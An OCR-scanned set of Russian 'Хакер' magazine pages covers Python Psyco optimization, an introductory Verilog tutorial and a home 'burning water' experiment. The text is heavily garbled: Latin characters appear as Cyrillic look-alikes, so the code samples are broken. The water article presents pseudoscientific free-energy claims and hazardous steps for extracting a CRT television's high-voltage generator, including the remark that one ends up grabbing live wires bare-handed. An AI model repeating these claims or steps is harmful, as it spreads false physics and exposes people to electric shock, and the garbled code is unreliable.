Сгу: 

ітрогС рзусо 



рзусо . ^и11 ( ) 

# необходимая инициализация 
ехсерЦ ІтрогРЕггог: 
разз 

В редких случаях производительность программы после бездумного 
применения РзуСо ухудшается. Связано это стем, что ЛІ-компиляция 
сложнее, чем генерация обычного байт-кода, поэтому она даетэффект, 
только если обработанная функция используется многократно. Если же 
программа состоит из большого количества редко вызываемых функций, 
то возможна потеря производительности. 

На сегодняшний день РзуСо перестал интенсивно развиваться, таккак 
разработчики занялись более масштабным детищем — проектом РуРу. 
Несмотря на это, РзуСо нетеряетсвоей актуальности. 

Н СТРАТЕГИЯ 

Известный специалист в области компьютерных наук Дональд Кнут 
говорит, что ранняя оптимизация — корень всехзол. Незря эти слова 
так часто цитируют в специальной литературе и свободном интернете! 
На практике получается, что узкие места в программном коде нахо- 
дятся совсем не там, где их обычно ищут. Действительно, сложность 
компиляторов стала настолько высока, что редко удается угадать, какой 
именно машинный код будет сгенерирован даже длятаких низко- 
уровневых языков, как С. Более того, усложнилась и сама техника, на 
которой выполняются программы. Имея ассемблерный код, и то трудно 
без испытаний сказать, насколько эффективно современный процес- 
сор будет выполнять те или иные его куски. В нашем случае появляется 
еще один осложняющий фактор — это интерпретатор. Оптимизирован 
он может быть многими способами, и одна и та же программа на разных 
реализациях РуіЬоп будет работать совершенно по-разному. 

Я (вместе с Дональдом Кнутом) советую тебе не заморачиваться на 
оптимизации раньше времени. Всегда пиши лаконичный и нагляд- 
ный код. Представь, что ты создаешь код в первую очередь не для 
машины, а для человека, который будет его читать. Ускорить хорошо 
продуманную и спроектированную программу гораздо легче, чем 
кривую, но «оптимизированную». Если ты все же недоволен скоро- 
стью работы своего кода, обязательно сперва погоняй программу 
профайлером. Выяви самыеузкие места, и начинай ихустранять 
только после того, как точно убедишься в эффективности выбранных 
методов. И не забудь, что оптимизацию всегда нужно начинать с 
переработки алгоритмов. Сокращение времени итерации циклов 
ничто, если есть возможность на порядокуменьшить их количество. 
Поэтому лучшим инструментом повышения эффективности были и 
остаются мозги! 



ХАКЕР 03 / 123 / 09 



► 105 





(ЕВГЕНИЙ «ѵзнмик» БЕЙСЕМБАЕВІ 



(ИЗУЧАЕМ ЯЗЫКИ ОПИСАНИЯ ЖЕЛЕЗА НА ПРИМЕРЕ ѴЕРІЕ06 



прошлых СВОИХ статьях Я не раз упоминал про 



емые Ло 



ігические Интегральные ьхемьи. Ьсли не читал^ то вкратце напомню 



это такой чип, на основе которого можн о создать сооственныи микропроцес 



Ісор, идеально заточенный под твои задачи. Для его описания мы использова 



и специально разраоотанный язык Ѵегііод. так называемый 



агаѵѵаге 



РевсгірЛоп ЬапдиадеІ. ОЬ основах программирования на таком непривычном 



[языке сегодня и пойдет речь 



КАК ОБРА 



егіЬд был придуман в 1985 году, в США. Вскоре Институт 
Электроинжененров взял его за стандарт ІЕЕЕ 1364, и на 
текущий момент существует несколько расширений языка 
(ѴегіЬд-2001 , ЗузІетѴегіІод — Ыір:/ /еп.ѵѵікіресііа.огд/ѵѵікі/ 
ВѵзІетѴегіІод ). куча связоки интерфейсов кС-подобным языкам. В 
общем, разновидностей ѴегіЬд’а придумано немало. Каждая корпо- 
рация-производитель ПЛИС затачиваетязыки компилятор под свои 
нужды, поэтому, прочитав об интересном приеме в учебнике, будь готов 
ктому, что какой-нибудь АКе га Оиагіиз этот прием не переварит, и тебе 
придется придумывать что-то свое. 

Ноги у этого языка растут из известного тебе С, — он считается менее 
громоздким и более простым в реализации. 

Главный конкурентѴегіЬд’а — ѴНВЕ, напоминающий языки АВАи 
Разсаі — также является стандартом, но использовать мы его не будем, 
можешь про него почитать отдельно. При этому языков больше сходств, 
чем различий, поэтому, оседлав один из них, ты сможешь с легкостью 
переключиться на другой, если он вдруг приглянется больше. 

Н ЧТО ЕСТЬ НОІ? 

Представь себе механизм, имеющий какую-либо связь с внешним 
миром. Кактолько снаружи приходитсигнал (нажали кнопку на пульте 
управления), внутри механизма что-то срабатывает, и им совершается 
действие (например, загорается лампочка]. Для удобного описания 
всяких механизмов и причинно-следственных связей и были придума- 
ны НОЕ-языки. 



Совсем необязательно НОЕ описывает микросхему или ПЛИС. На нем, 
по сути, можно накодить, что угодно — скажем, устройство, которое 
никогда не будет реализовано в принципе. Или старый ламповый 
телевизор. Или маятниковые часы. Даже запаянную с двух сторон 
металлическую кружку можнотак или иначе описать на НОЕ, потому как 
она железная (Ьагсіѵѵаге) и ты ее можешь потрогать :). Все, что можно 
представить блок-схемой, пишется запросто. 

Главная сложность, с которой сталкивается программист, начинающий 
писать на НОЕ, — ему необходимо осознать, что весь код будет в итоге ис- 
полняться одновременно. Как шестеренки в часах вращаются синхрон- 
но по событию маятника, таки операции внутри процессора выполняют- 
ся сразуже, параллельно, успевая до наступления следующего такта! 
Грубо говоря, в этом и естьотличиеалгоритмическихязыковтипа С или 
Разсаіот НОЕ-подобных. Если первые «указывают» некоторому абстрак- 
тному роботу-исполнителю последовательность действий, то вторые 
описывают внутренности самого «исполнителя», поведение которого 
будетзависеть от этих самых внутренностей. 

Зачемжеописыватьэти внутренности, спросишьты, когда можноопи- 
сать поведение? 

Отвечаю. Допустим, цельжизни какого-нибудь робота — перевозить 
поддоны с печеньками из печки вупаковочный цех. Естественно, 
приделывать к нему манипуляторы, например, для перевозки бутылок 
лимонада, смысла особого нет. Атвой ІпІеІСоге, в который ты загружа- 
ешьсвежескомпиленную сишную прогу, какраз и является мегаунивер- 
сальным роботом, который может делать абсолютно все. Не всегда и не 
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Внутри процессов типа аіѵѵауз надо использовать обыкновенные и 
привычные тебе «последовательные» операторы. Привожу краткий 
список того, что ты можешь использовать в Ѵегііо^’е. 

1 . Оператор ожиданрія. На этом операторе мы «висим» и ждем чего- 
нибудь. 

гед1 ==гед2; / /Стоим на месте , 

// пока условие не будет истинно 
@ (А ог В 
//Оператор события. 

//Ждем, пока А или В не изменится 
@ (розебде С ог педебде В) 

В последнем примере слова розеб^е и пе^еб^е внутри списка чувстви- 
тельности обозначают ожидание фронта и среза сигналов. То есть, 
как только значение С начнет меняться с О на 1 ріли П — с 1 на О, тут 
же сработает событие. Зачем это надо? Любой процессор получает 
тактовую частоту на вход. Это те самые гигагерцы, на которые ты 
смотришь при покупке и дальнейшем разгоне твоего камня. Для 
синхронности операций внутри ядра все должно начинаться на каж- 
дый новый фронт сигнала тактовой частоты. А в Ѵегііо^’е это будет 
записываться как «аіѵѵауз @ (розеб^е зузсіоск) . . .». 

2. Присваивание. Следуюш;ая операция не начнется до его заверше- 



гед1=гед2 ; 

3. Неблокируюш;ее присваивание. Советую тебе обратить внимание 
на эту штуку. Дело в том, что операция установки регистра занимает 
определенное время. Но зачем нам стоять на месте и ждать, пока 
копирование завершится (оператор « = ») , если мы можем парал- 
лельно выполнять еще кучу несвязанных с регистром дел? Тогда мы 
используем неблокирующее присваивание, при котором перескок 
на следующую операцию идет сразу после того, как регистр начнет 
устанавливаться. Хочешь по-настоящему быструю систему? Всегда 
используй неблокирующий оператор. 

гед1<=гед2 ; 



// Где-то тут завершилась запись в геді . 

4. Условный. Тут сложностей нет. 

ІГ (гед1 = = 2'Ы1) Ьедіп 
гед2<=0 ; 

епб 

еізе Ьедіп 

гед2<=гед2+1 ' Ы ; 

епб 

5. Оператор выбора. Сложностей тоже нет. 

рагатебег ШКІТЕ = 2'Ы1, КЕАВ = 2'ЫО, ШЕЕ = 2'ЬОО; 
//Прописали константы 
сазе (геді) 

ШЕІТЕ: гед2<=гед2 + 1 ’Ы; 

КЕАВ, ШЕЕ: Ьедіп 
гед2<=0 ; 

епб 

беіаиіб : 

гед2<=0 ; 

епбсазе 

6. Оператор цикла. Есть виды іог, ѵѵЫІе, гереан, іогеѵег. 

• іогеѵег оператор — выполняем оператор бесконечно. 

• гереан (кол-во раз) оператор — повторяем оператор нужное коли- 
чество раз. 

• ѵѵЫІе (выражение) оператор — повторяем оператор, пока выраже- 
ние истинно. 

• іог (начальное,условие,приращение) оператор — обыкновенный 
цикл «^ог», как и в Си. 
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■ ВЕК ѴѴ 



ДЛЯ всехзадач нужентакой монстр. Тогда ты берешьНОІи пишешьсвой 
проц, который почти ничего не умеет, ноте, что умеет — делает быстро, 
эффективно и без потребления сотен ватт мощности! 



Н ЧТО ТЫ ДОЛЖЕН ЗНАТЬ 

Учти, именно НОІ-языки сейчас становятся все более востребован- 
ными. Корпорации вплотную приблизили свои процессоры кпорогу 
частоты, и теперь для увеличения производительности им приходится 
оптимизировать и параллелить их. Ты можешь сам тренироваться 
создавать свои устройства, просто купив или спаяв отладочную плату 
с АКега Сусіопе и скачав бесплатный компилятор Оиагіиз с а Нега. сот . 
Крутой криптоанализатор или брутфорсер, работающий в разы быстрее 
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Разные ПЛИС разных компаний 



Из-за того, что Ѵегі1о§ создан для проектирования и эмуляции 
реальных схем, — двоичного представления уровня сигнала на 
линии бывает недостаточно. Кроме описания логического нуля (0) 
и логической единицы (1) требуется еще так называемое высокоим- 
педансное состояние 2 , когда порт ни к чему не подключен и «болта- 
ется в воздухе». К тому же, во время симуляции твоей схемы вполне 
возможно увидеть на линии неопределенное значение «х», когда 
симулятор не смог точно вычислить состояние линии, например, 
из-за конфликта на общей шине. При программировании ПЛИС 
состояния 2 и X тебе вряд ли понадобятся, но как только ты начнешь 
копать глубже в схемотехнику и пытаться симулировать какое-либо 
устройство, тебе придется использовать расширенный алфавит. 
Пример : 

4 ' Ы022 

//Старший бит порта драйвит единицу, третий драйвит 
ноль , а два младших — отключены от шины 



современных процессоров и при этом лениво стоящий на полочке, еще 
никому в хозяйстве не мешал! 

Для простого программирования было бы неплохо, чтобыты, несмотря 
на другой принцип НО I, неплохо владел Си или Ассемблер. Знание 
более высокоуровневых языков тоже подойдет, но будь готов ктому, что 
некоторые тонкости работы процессоров окажутся сюрпризом. 
Скомпилированный файл-«прошивку»тебе захочется залить в ПЛИС и 
потестировать, каконо работает на реальном железе. Поэтому знание 
основ электроники, умение конфигурировать порты микросхем также 
будут нелишними. 

Итак, цель создания языков описания железа понятна. Разберем син- 
таксис. Как я уже говорил, ѴегіЬд очень похож на язык С. 

г БАЗОВЫЙ СИНТАКСИС 

1 . Комментарии имена^ константьц числа. 

Если не умеешь писать на каком-либо языке, научись, как минимум, 
синтаксису его комментариев. Тогда хотя бы не будет ругаться компи- 
лятор. 
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/ /Это комментарий 
/* 

Здесь фантазии по поводу светлого будущего 
*/ 

В ѴегіЬд’е имя (идентификатор) — это последовательность букв и цифр, 
знаков «$» и «_», причем начинаться оно обязано не с цифры. Регистр 
имеетзначение. 

Если начальный символ — «\»,то следом за ним может идти любая 
последовательность символов. Все, что до пробела, будет считаться кор- 
ректным именем. Например: «СЬагасІег», «сНагасІег», «фСЬагасІег», 
«Ѵс+На'^гасіег». 

Константы в Ѵегііод’е имеютособую форму записи. Сначала идет разряд- 
ность числа, потом кавычка (‘), за ним — основание системы счисления 
(Ь, о, сі, Ы и сами цифры. Примеры: 

"7"]з7Р" //семибитное число 12 7, записанное в шестнадца- 
теричной (й — йех) форме. 

" 7 "Ы111_1111 ' //то же самое число, записанное в двоич- 
ной форме . Знак игнорируется. 

" 10 " // число 127, занимающее не 7 бит, а 10. 

То есть, равно 000_1111_1111 . 

//Теперь, если попытаться записать его в какой-нибудь 
восьмибитный регистр, компилятор возвратит ошибку. 

"18" // число, записанное в стандартной форме, будет при- 
ведено к десятичному Іпбедег. 

"0.5" // будет приведено к типу Ііоаб. 

2. Регистры. 

То, что ты привык называть переменной, в Ѵегііод’е называется регист- 
ром. Например: 

гед [7:0] сйагасбег ; 

Так мы объявили регистр шириной 8 бит (от нуля до семи] с именем 
сЬагасІег. Каки в переменную, в регистр можно класть значение и читать 
его оттуда: 

гед [7:0] ѵагі; 

гед [15:0] ѵаг2 = 16 'Ы001_0110_1011_1101 ; 

. . . зкір . . . 

ѵагі [7:0] = ѵаг2 [15:8] ; 

Здесь мы кладем в регистр ѵагі старшую половину регистра ѵаг2, кото- 
рый в два раза «шире». В итоге, там будет лежать число 8’Ы001_01 10, то 
есть 0x966. 

Примечание: строго говоря, в ѴегіЬд’етоже есть нормальные челове- 
ческие переменные, причем регистр — это переменнаятипа гед. Также 



бываюттипы іпіедег, [іте, геа[ и другие. Но в ближайшее время это 
тебе не понадобится, поэтому считай, что переменная в ѴегіЬд’е и есть 
регистр. 

Кстати, массивы здесьтоже есть! 

гед [2:6] Аггау [0:5]; / /б пятибитных векторов . 

3. Сигналы С-ѵ/ігс). 

Это особый вид объектов, аналогом которому в алгоритмических языках, 
полагаю, являются указатели. Такназываемое«соединение-цепь» или 
ярлык, связывающий части схемы между собой. 

Предположим, естьу нас некая переменная-регистр, котдельным битам 
которой часто приходится обращаться по ходу действия. Введем сигнал, 
привязанный к одному биту переменной: 

гед [7 : о ] беѵісе_соп1ід; 

ѵ^іге рогб_0_бігес1:іоп = беѵісе_соп1ід [ 0 ] ; 
ѵ^іге рогР_1_бігесРіоп = беѵісе_соп1ід [ 1 ] ; 

. . . Пропущено . . . 

11 ( !рог1_0_бігес1іоп) беѵісе_ба1а [ 0 ] <= раг_ 

рог1_0 [7:0]; 

Связь рог[_0_сІігес1:іоптеперьтождественно равна младшему биту ре- 
гистра с1еѵісе_соп[ід[0]. Сталоудобнее: не надо запоминать, что там и как, 
в большом регистре сІеѵісе_соп[ід, а главное — мы можем в нужный мо- 
мент программной логикой перебросить этотсигнал на другой регистр: 

рог1_0_бігес1іоп = беѵісе_соп1ід [ о ] & беѵісе_соп1ід [2 ] ; 

Теперь рог1:_0_сІігес1:іоп будет равен Столько если единице равны О и 2 
биты регистра сІеѵісе_соп[ід. 

Связи могут быть также типа Монтажное И (ѵѵапсі). Монтажное ИЛИ (ѵѵог), 
[гіО, [гіі — и много других, но они реже используются. 

4. Процессы ^ іпі'^іаі. 

Процесс — это такой кусок кода, внутри которого все операции вы- 
полняются последовательно. Это то самое движение, те шестеренки, 
ради которых мы и городим весь остальной код. Процесс может быть 
непрерывным, срабатывающим на какое-либо событие или, вообще, 
исполняемым ровно один раз для инициализации. 

гед [7:0] соипбег; 

аіѵ^ауз / / а1ѵ\;ауз обязан содержать хотя бы 

/ / один оператор ожидания , что мы и видим 
@ (розебде Зузсіоск) //Событие без ";" 

// является условием запуска следующей за ним опер, группы 
Ьедіп 

соипРег = соипРег + 1'Ы; 

епб 
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Ключевое слово, указывающее на процесс — аіѵѵауз. Затем идеттак 
называемый оператор ожидания события «И» и списокчувствительнос- 
ти в скобках (смотри врезку). А между словами Ьедіп и епб — самотело 
процесса. 

Кактолько значение переменной ЗузсЬск сменится с О на 1 , регистр 
соипіегувеличится на единичку. 

Всякие «нормальные» последовательные операторы 
(«=»,«<=»,«іІ»,«са5е», еіс.] разрешено использовать только внутри про- 
цессов. Полный списокоператоров в языке ѴегіЬд указан во врезке. 
Если вместо аіѵѵауз стоит іпібаі, то процесс выполнится однократно. 

5. ГруппыоператороБ. 

То, что ограничено словами Ьедіп и епб, называется составной группой. 
Это то же самое, что и фигурные скобки в языке Си. 

Авотчего нетв Си,такэто параллельных групп: 

гед[7:0] соипСег = 0; 
гед[7:0] апСісоипСег = 0; 
а1ѵ\?ауз @(розесіде Зузсіоск) ^огк 
соипкег = соипкег + 1'Ы; 

//<- -Операция раз 

апСісоипРег = апСісоипРег — 1'Ы-, 

/ /<- -Операция два 
3 оіп 

Здесь изменение регистров соипіег и апЬсоипІег будет происходить па- 



раллельно в один итотже момент времени. Используя Іогк и )оіп вместо 
Ьедіп и епЬ, мы расходуем в два раза меньше времени, выполняя эти две 
операции независимо друг от друга! 

6. Модули. 

Модули (тосіиіе] в ѴегіЬд’е — это что-то типа черныхящиков или блоков 
обработки. Больше всего они похожи на функции в алгоритмических 
языках программирования. Как и функции, модули имеют входные и 
выходные параметры. 

ПРОСТО ИНВЕРТИРУЕТ ВХОДНОЙ БИТ 

тосіиіе ЫоР ( іприРѵ\[іге1 , оиРѵ7Іге1); 
іприР іприРѵ7Іге1; 

//Не указываю разрядность, значит однобитовые параметры 
оиРриР оиРѵ^ігеІ; 
гед оиРѵ\[іге1; 
аЫауз @ ( іприРѵ7Іге1 ) 

оиРѵ7Іге1<=! ( іприРѵ7Іге1 ) ; 

епбтобиіе; 

Здесь из «ящика»торчатдва провода. Кактолько на входном проводе 
меняется значение, оно инвертируется и появляется на выходном. 

В скобках мы указываем все провода, какие есть, а уже внутри модуля 
— указываем их «направление». Порт может быть входной (іприі:), выход- 
ной (оиіриі:) и двунаправленный (іпоиі:). 
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Механизмы неидеальны, а свет имеет конечную скорость. Ѵегі1о§ не 
был бы языком описания железа, не умей он учитывать подобные 
проблемы. 

По сути, главное знание, отличающее профессионального НПЬ- 
кодера от новичка, — это правильное понимание того, что сигналы 
распространяются не мгновенно, и еще умение правильно со- 
ставлять код для уменьшения задержек. В компиляторы под ПЛИС 
часто уже включена опция Тітіп§ Апаіузіз, которая автоматически 
просчитает время распространения сигналов на кристалле. Все, 
что тебе остается, это убедиться, что максимальная задержка не 
превышает периода тактовой частоты твоего будущего процессора. 
Если нет — оптимизируй свой код. 

Например, пользуйся неблокирующими операторами присваива- 
ния (< = ) вместо блокирующих (=) везде, где только можно. Это 
позволит компилятору распараллелить копирование регистров 
и увеличит шансы, что операция выполнится до прихода нового 
фронта синхроимпульса. В идеале, такое присваивание завершится 
через бесконечно малый промежуток времени, в моделировании 
обзываемый «дельта-задержкой» (для воспроизведения причинно- 
следственных отношений), но в случае реального железа время 
будет ощутимое, хоть и в разы меньше, чем при использовании 
блокирующего присваивания. 



Уважающий себя черный ящикдолжен иметь внутри себя какие-нибудь 
шестеренки и движущиеся детали, реагирующие на внешние импульсы. 
Что мы и видим по ключевому слову а [ѵѵауз. 

Могутли быть статические, не «движущиеся» черные ящики? Да, могут. 

ПРОСТО ИНВЕРТИРУЕТ ВХОДНОЙ БИТ 

тосіиіе ЫоСІ ( іприСѵ^ігеІ , оиСѵ^ігеІ); 
іприС іприСѵ^ігеІ ; 

//Не указываю разрядность, значит однобитовые параметры 

оибриб оибѵ7Іге1; 
гед оибѵ^ігеі; 

аззідп оибѵ^ігеі = ! ( іприбѵ^ігеі ) ; 
епбтобиіе; 
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Давай рассмотрим пример полностью готового и рабочего моду- 
ля для простого триггера — примитивного последовательного 
устройства. Этот черный ящик будет запоминать значение а или 
Ь в момент подачи на него сигнала сіоск. 

Что именно он запомнит, будет зависеть от значения управляю- 
щего сигнала зѵѵігсіі. При подаче сигнала гезег модуль все забудет 
и станет вьщавать 0. 

Объедини миллиончик- другой таких триггеров в один корпус 
— и ты получишь Пентиум :) . 

тобиіе бгід (сіоск, а, Ь, зѵ7Ібс1і, гезеб, оиС) ; 
іприб сіоск, гезек; //Тактовая частота и сброс 

іприк а, Ь; //Входы 

іприк зѵ^ікок; / /Управляющий сигнал 



оикрик оик ; 
он запомнил 
гед оик ; 



//Выход триггера. Здесь будет то, что 
//Пояснили, что это кусочек памяти 



ѵ^іге іп; 

аззідп іп = зѵ/іксП ? а : Ь; //Жесткая привязка 

//аззідп іп = а ? 1 : 0; //Так мы бы получили 

В-триггер, запоминающий один параметр 
//аззідп іп = а; //А вот так 

— ВЗ-триггер, где Зек — это "а" , а Кезек — "гезек" 

а1ѵ7ауз @(розебде сіоск ог розебде гезек) //Если при- 
шел клок или ресет 
ік (гезек) 

//Если ресет, то обнуляем выход 
оик <= о ; 

еізе 

//Иначе обновляем значение 
оик <= іп; 

епбтобиіе 



Этот ящик делает все туже операцию, ноуже без отслеживания внешних 
событий, — просто непрерывно инвертирует входной бит, статически 
выдавая его наружу. Шестеренок нет, зато есть намертво запаянные 
провода. Чуешь разницу? 

7. Операции. 

Здесь — все, какты привык, так что вкратце: 

Сложение ( + ) , 

Вычитание (-) , 

Умножение (*) , рекомендуется писать свою реализацию ум- 
ножения 

Целочисленное деление ( / ) , 

Модуль (%) , 

Поразрядные И, ИЛИ, НЕ, ХОК (&, | ,~,^) 

Логические И, ИЛИ, НЕ (&&, I I , ! ) , дают однобитовый ре- 
зультат 

Операции отношения ( == , ! = ,>,<,>=,< = ) 

Сдвиги (»,<<) 

Атакже есть интересная операция «склеивания», 
то есть конкатенации: 



гед[7:0] Еід]ткз = 8 ' Ь0000_0001 ; 

. . . зкір . . . 

Еід]ткз[7:0] = { Еід]ткз[0] , Еід]ткз[б:1] } ; 

То, что справа — имеет ширину 8 бит и склеено из нулевого и оставшихся 
семи бит переменной ЫдЫз. В общем, выведи мы содержимое этого 
регистра наружу на светодиоды, наблюдали бы бегающий «огонек». На 
каждый та кт «хвост» перемещается в «голову» регистра, а потом нето- 
ропливо ползет назад. И так по кругу. 

Н ЗАКЛЮЧЕНИЕ 

Лаконичный материал этой статьи уже позволиттебе написать нормаль- 
ную, «взрослую» прошивку для своей ПЛИС. Но это лишь основы, —тот 
минимум, который ты должен знать, садясь за кодинг. 

Важно размятьсвой привыкший к последовательной логике мозги 
представить механизм, в котором параллельно происходят десятки 
взаимосвязанных движений. Надеюсь, что подвигнул тебя к изучению 
чужих примеров и чтениюучебников. Можетбыть, когда-нибудь мы таки 
услышим о создателе сверхбыстрой процессорной архитектуры, читав- 
шем в молодости «Хакер». ^ 
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давних времен перед человеком стояли проблемы энерге- 
тики, будьте отопление кузниц, помещений, зданий, плавка 
металлов и проч. Для этих целей всегда использовались 
различные виды топлива, так называемые энергоносители, 
и они часто были в дефиците. Например, дерево, уголь, газ, нефть... этот 
список можно долго продолжать, и закончится он дорогостоящим обога- 
щенным ураном и чистым водородом. 

А теперь представим, как бы сложилась наша жизнь, если бы энер- 
гия была доступна всем и каждому. Ни для кого не секрет, что любое 
вещество содержиточень много потенциальной энергии, которую можно 
высвободить, создавая специальныеусловия. 

На секундочку задумаемся — чего на планете у нас очень много? Верно, 
воды! Ну,такдавай же начнем сжигать воду с пользой для человечества, 
тем более что после сгорания вода конденсируется в пар. 

ЦЕЛИ НАШЕГО ИССЛЕДОВАНИЯ 

ИзоБрести такое устройство^ которое могло бы^ как минимум^ 
конкурировать с ОБОгревателями и иными отопительными сис- 
темами для домов^ коттеджей и предприятий^ ва счет получения 
энергии при расщеплении воды. 

Н НОВАЯ ТЕОРИЯ РАСПАДА ВОДЫ 

Давноуже разработаны принципы работы установки, позволяющей 
использовать воду в качестветоплива (вспомним ячейку Майквеста, 
пресловутый аллюминиево-галиевый водородный двигатель и т.д). На 
самом деле, там не все так сложно, и, чтобы это показать — сегодня мы 



попытаемся приблизиться к ее реализации. В нашем случае мы тратим 
меньше энергии, чем другие аналоги. В аналогах используется очень 
мощная электродуга, которая выделяет большую температуру. Под ее 
действием вода сначала распадается на кислород и водород, а потом 
уже идет возгорание кислорода и т.д. Как горит водород — ты знаешь. 
Возможно, слышал, как из-за утечки водорода за считанные секунды 
сгорали дирижабли, или прожигали толстостенную сталь в металлургии. 
В новом методе применяется эффект молекулярного резонанса. Чтобы 
растолковать идею, я попробую изобразить молекулу воды на иллюстра- 
циях — в стадиях до и после воздействия. 

Уже давно известны явления электростатического распыления воды, 
которое заставляет воду делиться под действием сильных напря- 
жений. Но под действием тока специальной частоты мы получим 
необычный эффект, такой, что вода начнет резонировать на атомар- 
ном уровне. Тут надо вспомнить структуру молекулы воды. По сути, 
мы имеем дело с устойчивой системой, стремящейся к равновесию. 
Фишка в том, что любую такую систему можно, как правило, вывести 
из этого состояния (в качестве примера можешь рассмотреть маят- 
ник). При распаде молекулы воды выделяется некоторое количес- 
твоэнергии. Мне не удалось ее зафиксировать, ноя смогзаписать 
звуковые колебания, порождаемые данным резонансом — колебания 
были на частоте порядка 60 герц. Смотри видео на диске: до нас этого 
еще никто не замечал! На данный момент я занимаюсь перестройкой 
своего генератора на эту частоту, с целью выяснить, а что же будет 
дальше?! И самое интересное, что на поставленный вопрос никто не 
ответит, кроме меня самого. 
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в ЗАМУТИМ ГЕНЕРАТОР ИЗ ПОДРУЧНЫХ СРЕДСТВ 

Асейчас начнется веселая практика. Мы стобой будем на 
скорую руку мастерить генератор высоковольтного высоко- 
частотного напряжения мощностью 20 ватт. Наверное, уже 
думаешь, что все окончится нехваткой средств на радиоде- 
тали в магазине? Ничего подобного, тебе всего лишь пот- 
ребуется старый, уже пожелтевший монитор или бабушкин 
советский телик (смотри врезку на этой странице). 

Ты уже раздобыл ненужный телик и теперь не знаешь, с 
какой стороны к нему подобраться? Тут все проще, чем 
кажется. Но прежде чем мы стобой раскурочим несчаст- 
ный в ыжигатель мозгов, я расскажу отом, какой работает. 
Трубка кинескопа — это, по сути, обычная лампочка, внутри 
которой вакуум, различные пластинки и электроды. Смысл 
всей этой конструкции в том, чтобы каждый электрон, 
вылетающий из луча «анод ^катод», попал в строго опре- 
деленную ячейку матрицы экрана с нужной скоростью и в 
нужное время. Но поскольку лучику нас достаточнотонкий 
и шустрый, разработчики решили одним лучиком с бешеной 
частотой прорисовывать строчки на экране. Отсюда, кстати, 
и пошло название «строчник» для блока высокого напряже- 
ния в телевизоре. Так вот, луч у нас есть, но я забыл сказать, 
что он управляется малоинтересными для нас маломощны- 
ми сигналами и импульсами, в результате которых электрон 
примагничивается в нужную сторону и зажигает пиксель 
нужным нам цветом. Какты уже понял, нас интересовать 
могут следующие вещи: 

• все, что идет от вилки питания 220 вольт до основной 
платы; 

• всетолстые провода, идущие к кинескопу (у нихтолстая 
изоляция, какправило, красная) 

• ну и, поскольку нам не нужен кинескоп, мы смело бе- 
рем кусачки и отстригаем все лишнее, мешающее выдер- 
нуть «долгожданный» генератор. Режем все шлейфа и 
тонкие провода. Сразу предупреждаю, что бабушка после 
этих злодеяний даже гипотетически не сможет посмот- 
ретьтелевизор. Отстриг? Молодец! В итоге, из платы тор- 
чат два провода красного цвета, один из них чутьтолще 
— все остальноетобой уже срезано под корень. Эти два 
провода являются плюсами. А где же минус? Минус — это 
земля или самая массивная дорожка на плате, которая 
связана с большей частью радиодеталей на схеме. Иног- 
да массой также могут являться радиаторы охлаждения, 
при условии, что они основательно впаяны в плату. 

Ты уже хочешьувидетьискру?Тогда смело включай блок 



питания в розетку, только соблюдай технику безопасности и 
поглядывай, что бы твоя рука чисто случайно не задела какой- 
либо провод и тебя недолбанулотоком. В принципе, это не 
смертельно, но руку может отбросить очень сильно. Атеперь 
можешь медленно, зажимая красный провод в пассатижах с 
изолированными ручками [не просто покрытыми сили- 
коном, а способными выдержать 1000 вольт! — Прим, 
ред], начать подносить его к массе. По первой это немножко 
пугает, но потом организм наглеет до такой степени, что ты 
начинаешь хвататься за провода голыми руками (поскольку 
уже будешьзнать, за что именно получаешьудартоком). Вот, 
мы стобой вкратце рассмотрели устройство генератора вы- 
соковольтного напряжения. Я считаю, ты без труда сможешь 
подвесить перед катушкой тиристорный каскад, который 
посредством М К будет у прав л ять частотой выдаваемого тока. 
Это была теория, а что касается практики — делай следу- 
ющее: бери стакан, наливай в него воду, опускай поло- 
жительный провод на дно, а массой попробуй коснуться 
поверхности воды. Как проскочит искра, начинай медленно 
отводить провод и станешь свидетелем того, как горит вода. 
Если ты все еще считаешь, что это дуга, то дунь на нее, она 
погаснет, подобно свечке. Аэто значит, что мы имеем дело 






> СІѴСІ 

На диске тебя ожи- 
дают видеозаписи 
некоторых моих опы- 
тов, а также журнал, 
куда я записывал все 
увиденное. 



1 ) Чем больше диагональ экрана — тем лучше . 

2) Если мы нажмем на чудесную кнопку «вкл», то не должно сыпаться искр или 
дохлых тараканов из-под задней крышки (в моей жизни бывало и такое) . Мы 
должны услышать мелодичное «цзинь», которое свидетельствует о том, что 
напряжение дошло до кинескопа. 

3) Если по монитору идут пятнаХискажения цвета, то смотрим на пункт №2 и 
включаем пофигизм. 

4) Цветная техника все-таки имеет более мощные источники питания и ра- 
ботает под более высоким напряжением. А это значит, что самым идеальным 
для нас был бы цветной советский бабушкин телик в стиле «подставка под 
вазочку». 



На столеу меня — малость модернизированные потроха СЕТ-монитора. 
Плазмотрон работает 



На фото — возгорание иглы. Начало горения. Внутрь шприца залита 
обыкновенная вода из-под крана 
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На фотке видно, что вода мутнеет. Происходит захват хи м веществ из А на этой фотке уже более эффективная конструкция, которая выделяет 

воздуха. Мы наблюдаем пиролиз воды большетепла 




> Ііпкз 

в статье я доволь- 
но-таки часто 
употребляю слово 
«резонанс». Откуда 
он берется и что 
может дать полезного 
в наших безжа- 
лостных попытках 
расщепить воду? 
ЬирѴ/гц.ѵѵікіресІіа. 
огд/ѵѵікі/Резонанс 



уже не с электромагнетизмом. Также интересен тот факт, что 
если подключить мультиметр и подсчитать затраты, пускай 
даже в не налаженном состоянии, то ты увидишьрезкое 
снижение электроэнергии при возникновении пламени. 
Атеперьмы поставим эксперимент по-другому. Для этого 
возьмем медицинский шприце иголкой, наберем в него воды, 
затем на иглу намотаем провод массы и начнем медленно под- 
носитьего к другому электроду. На расстоянии примерно 5-6 
мм до точки касания надави на шприц, и ток потечет по тонкой 
струйке воды. Таким образом, создаваяте или иныеусловия, 
ты сможешь наблюдать сразу четыре явлен ИЯ: 

• электростатическое распыление воды; 

• горение (появится оранжево-желтое пламя); 

• при правильном резонансе — мини-гидроудары внутри 
иглы, которые ты будешь чувствовать рукой; 

• горение воды внутри иглы с последующим ее испарени- 
ем, напоминающее бенгальский огонь. Почувствуешь себя 
металлургом :). 

Мы многого добились, например, смогли поджечь воду 
внутри стальной медицинской иглы. Это привело к испаре- 
нию в течение 5 секунд, что свидетельствует о присутствии 
высокой температуры (выше 4000 градусов!). 

В домашних условиях, увы, не уда л ось за мерить тепловы- 
деление, но можно проанализировать эту систему. Наш 



генератор потребляет за 5 секунд работы примерно 20 
ватт электроэнергии. Для испарения медицинской иглы 
требуется энергия 1 00 ватт. Даже за вычетом всевозмож- 
ных потерьу нас должно остаться немалое количество 
энергии, которой можетхватить и на автономность, и на 
потребителей. 



